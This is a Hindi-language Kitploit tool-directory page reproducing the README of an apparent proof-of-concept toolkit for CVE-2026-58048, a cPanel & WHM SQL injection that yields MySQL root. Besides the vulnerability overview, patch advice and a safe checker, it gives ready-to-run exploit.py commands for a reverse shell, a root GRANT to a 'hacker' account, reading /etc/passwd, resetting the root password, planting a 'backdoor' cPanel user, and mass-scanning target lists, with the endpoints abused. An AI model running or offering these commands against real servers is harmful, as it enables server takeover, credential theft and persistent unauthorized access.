Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-58048-PoC-Exploit — 👾 CVE-2026-58048 – cPanel रूट SQL एक्ज़ीक्यूशन टूलकिट (CVSS 9.4) | अनपैच्ड cPanel और WHM 11.x के लिए पूर्ण Red/Blue Team टूलकिट सूट। 2 टूल्स: Safe Checker (ऑडिट/रिपोर्टिंग), Weaponized (रिवर्स शेल, पर्सिस्टेंस, UDF RCE, डिप्लॉयमेंट, फ़ाइल रीड/राइट, डेटाबेस ऑपरेशन्स, मास स्कैन)। Python के साथ। 🦾 नैतिक रूप से उपयोग करें, कानूनी रहें <3 | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-58048-poc-exploit
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
डेटाबेस सुरक्षा
GitHubtc4dy/cve-2026-58048-poc-exploit

CVE-2026-58048-PoC-Exploit

रिपॉजिटरी देखें
5251 महीना पहलेअभी तक समीक्षित नहीं

विवरण

👾 CVE-2026-58048 – cPanel रूट SQL एक्ज़ीक्यूशन टूलकिट (CVSS 9.4) | अनपैच्ड cPanel और WHM 11.x के लिए पूर्ण Red/Blue Team टूलकिट सूट। 2 टूल्स: Safe Checker (ऑडिट/रिपोर्टिंग), Weaponized (रिवर्स शेल, पर्सिस्टेंस, UDF RCE, डिप्लॉयमेंट, फ़ाइल रीड/राइट, डेटाबेस ऑपरेशन्स, मास स्कैन)। Python के साथ। 🦾 नैतिक रूप से उपयोग करें, कानूनी रहें <3

साझा करें

CVEPoC

💥 CVE‑2026‑58048 – cPanel रूट SQL निष्पादन टूलकिट

Python 3.8+ CVSS Author cPanel

⚠️ केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए टूल प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑58048 cPanel & WHM संस्करण 11.x में एक गंभीर SQL इंजेक्शन भेद्यता है जो एक प्रमाणित cPanel उपयोगकर्ता को डेटाबेस नाम बदलने की कार्यक्षमता के माध्यम से MySQL रूट विशेषाधिकारों के साथ मनमाने SQL कमांड निष्पादित करने की अनुमति देती है।

यह कैसे काम करता है

  1. प्रमाणित पहुँच आवश्यक – हमलावर के पास लक्ष्य सर्वर पर एक वैध cPanel खाता (उपयोगकर्ता नाम/पासवर्ड) होना चाहिए।
  2. SQL मोड हेरफेर – एक्सप्लॉइट MySQL सत्र को ANSI_QUOTES मोड में सेट करता है, जो पार्सिंग व्यवहार को बदल देता है।
  3. डेटाबेस नाम बदलने में इंजेक्शन – डेटाबेस का नाम बदलते समय, नया नाम ठीक से सैनिटाइज़ नहीं किया जाता, जिससे हमलावर मनमाने SQL स्टेटमेंट इंजेक्ट कर सकता है।
  4. रूट विशेषाधिकार – चूँकि नाम बदलने का ऑपरेशन MySQL रूट विशेषाधिकारों के साथ चलता है, इंजेक्ट किया गया SQL उच्चतम डेटाबेस अनुमतियों के साथ निष्पादित होता है।
  5. प्रभाव – पूर्ण डेटाबेस अधिग्रहण, विशेषाधिकार वृद्धि, सर्वर समझौता, डेटा चोरी, बैकडोर, और पार्श्व गति। तुरंत अपग्रेड करें!

प्रभावित संस्करण

  • cPanel & WHM 11.110 और पुराने – भेद्य
  • 11.111 – 11.118 – भेद्य
  • 11.119 – 11.126 – भेद्य
  • 11.127 – 11.134 – भेद्य
  • 11.135 – 11.136 – भेद्य
  • 11.137.x – 11.137.1.6 से नीचे भेद्य
  • 11.138.1.6 और बाद के – पैच किया गया

पैच

  • cPanel & WHM 11.138.1.6 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो अस्थायी उपाय के रूप में cPanel उपयोगकर्ताओं के लिए MySQL नाम बदलने के ऑपरेशन अक्षम करें।

🧰 टूल्स

टूलउद्देश्यइच्छित उपयोगकर्ता
exploit.pyरिवर्स शेल, पर्सिस्टेंस, UDF RCE, फ़ाइल पढ़ना/लिखना, डेटाबेस ऑपरेशन, प्रॉक्सी समर्थन, और मास स्कैनिंग के साथ पूर्ण हथियारबंद टूलकिट।रेड टीमें / अधिकृत पेंटेस्टर

📊 विशेषता तुलना


🎯 उपयोग केस सारांश


⚙️ स्थापना

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-58048-PoC-Exploit
cd CVE-2026-58048
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
colorama
pymysql

📋 पैरामीटर

exploit.py पैरामीटर

safecheck.py पैरामीटर


💥 परिदृश्य


🧪 एंडपॉइंट और API उपयोग

एक्सप्लॉइट निम्नलिखित cPanel UAPI एंडपॉइंट का उपयोग करता है:


🛡️ जिम्मेदार उपयोग

  • इन टूल्स का उपयोग केवल उन सिस्टम पर करें जिनके आप मालिक हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुँच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
safecheck.py
गैर-घुसपैठिया भेद्यता जाँचकर्ता जो cPanel संस्करण का पता लगाता है और किसी भी दुर्भावनापूर्ण पेलोड को निष्पादित किए बिना जोखिम का आकलन करता है। विस्तृत रिपोर्ट तैयार करता है।
ब्लू टीमें / सुरक्षा ऑडिटर
विशेषताexploit.pysafecheck.py
भेद्यता का पता लगाना✅✅
संस्करण का पता लगाना✅✅
MySQL रूट SQL इंजेक्शन✅❌
रिवर्स शेल✅❌
पर्सिस्टेंस (cPanel उपयोगकर्ता निर्माण)✅❌
UDF RCE (कमांड निष्पादन)✅❌
फ़ाइल पढ़ना/लिखना✅❌
डेटाबेस ऑपरेशन (कोई भी SQL)✅❌
प्रॉक्सी समर्थन✅✅
मास स्कैनिंग (मल्टी-थ्रेड)✅❌
इंटरैक्टिव शेल✅❌
गैर-घुसपैठिया (सुरक्षित) मोड❌✅
वर्बोज़/डीबग मोड✅✅
SSL सत्यापन नियंत्रण✅✅
कस्टम User‑Agent✅✅
अनुरोध विलंब / पुनः प्रयास✅❌
JSON / रिपोर्ट आउटपुट✅✅
एंडपॉइंट पहुँच जाँच❌✅
SQL मोड लीकेज का पता लगाना❌✅
परिदृश्यअनुशंसित टूल
ब्लू टीम – यह सत्यापित करना कि आपकी cPanel स्थापना भेद्य है या नहींsafecheck.py
सुरक्षा ऑडिट – गैर-घुसपैठिया भेद्यता मूल्यांकनsafecheck.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafecheck.py
मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँचexploit.py (केवल पता लगाना)
घटना प्रतिक्रिया – यह जाँचना कि सिस्टम समझौता किए गए हैं या नहींsafecheck.py
पैरामीटरविवरण
-t, --targetलक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083)
-l, --target-fileमास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-u, --mysql-usercPanel/MySQL उपयोगकर्ता नाम
-P, --mysql-passcPanel/MySQL पासवर्ड
--mysql-portMySQL पोर्ट (डिफ़ॉल्ट: 3306)
-p, --portcPanel पोर्ट ओवरराइड करें (डिफ़ॉल्ट URL से या 2083)
--threadsमल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
-o, --outputपरिणाम फ़ाइल में सहेजें (एकल लक्ष्य)
--logविस्तृत आउटपुट के लिए लॉग फ़ाइल
-v, --verboseवर्बोज़ आउटपुट
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
-ua, --user-agentकस्टम User‑Agent
--no-keep-aliveसत्र को जीवित न रखें
--delayअनुरोधों के बीच विलंब (डिफ़ॉल्ट: 2.0s)
--max-retriesअधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3)
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--cmdनिष्पादित करने के लिए कमांड (विशिष्ट के लिए sql: या udf: के साथ उपसर्ग करें)
--injectइंजेक्ट करने के लिए कस्टम SQL (अन्य क्रियाओं को ओवरराइड करता है)
--reverse-shellरिवर्स शेल IP:PORT (UDF का उपयोग करता है)
--passwdरूट MySQL पासवर्ड बदलें
--addusercPanel उपयोगकर्ता बनाएँ (USER DOMAIN PASSWORD)
--readLOAD_FILE के माध्यम से फ़ाइल पढ़ें
-i, --interactiveशोषण के बाद इंटरैक्टिव शेल
--verifyMySQL लॉगिन का प्रयास करके शोषण की सफलता सत्यापित करें
--pingशोषण से पहले लक्ष्य को पिंग करें
पैरामीटरविवरण
-t, --targetलक्ष्य cPanel URL (जैसे https://cpanel.example.com:2083)
-v, --verboseवर्बोज़ आउटपुट
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
-ua, --user-agentकस्टम User‑Agent
--ssl-verifySSL प्रमाणपत्र सत्यापित करें
--timeoutसेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--logरिपोर्ट फ़ाइल में सहेजें
--jsonपरिणाम JSON प्रारूप में आउटपुट करें
#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython safecheck.py -t https://cpanel.example.com:2083
2रिपोर्ट के साथ विस्तृत स्कैनpython safecheck.py -t https://cpanel.example.com:2083 --log report.txt --json -v
3रिवर्स शेलpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --reverse-shell 192.168.1.100:4444
4कस्टम SQL निष्पादित करें (रूट)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --inject "GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'pwned'"
5संवेदनशील फ़ाइल पढ़ेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --read /etc/passwd
6MySQL रूट पासवर्ड बदलेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --passwd NewRootPass123
7नया cPanel उपयोगकर्ता बनाएँ (पर्सिस्टेंस)python exploit.py -t https://cpanel.example.com:2083 -u user -P pass --adduser backdoor domain.com Parola123
8शोषण के बाद इंटरैक्टिव शेलpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass -i
9फ़ाइल से मास स्कैनिंगpython exploit.py -l targets.txt -u user -P pass --threads 20 --output results.json
10प्रॉक्सी और कस्टम User‑Agent का उपयोग करेंpython exploit.py -t https://cpanel.example.com:2083 -u user -P pass --proxy http://127.0.0.1:8080 -ua "Mozilla/5.0 (X11; Linux x86_64)"
एंडपॉइंटउद्देश्य
/execute/Mysql/create_databaseअस्थायी डेटाबेस बनाएँ
/execute/Mysql/delete_databaseबनाए गए डेटाबेस साफ़ करें
/execute/Mysql/rename_databaseभेद्य एंडपॉइंट – SQL इंजेक्शन को ट्रिगर करता है
/execute/Version/get_versionप्रमाणीकरण और संस्करण जाँच
/execute/UserManager/create_userनया cPanel उपयोगकर्ता बनाएँ (पर्सिस्टेंस)
/execute/UserManager/list_usersमौजूदा उपयोगकर्ताओं की सूची बनाएँ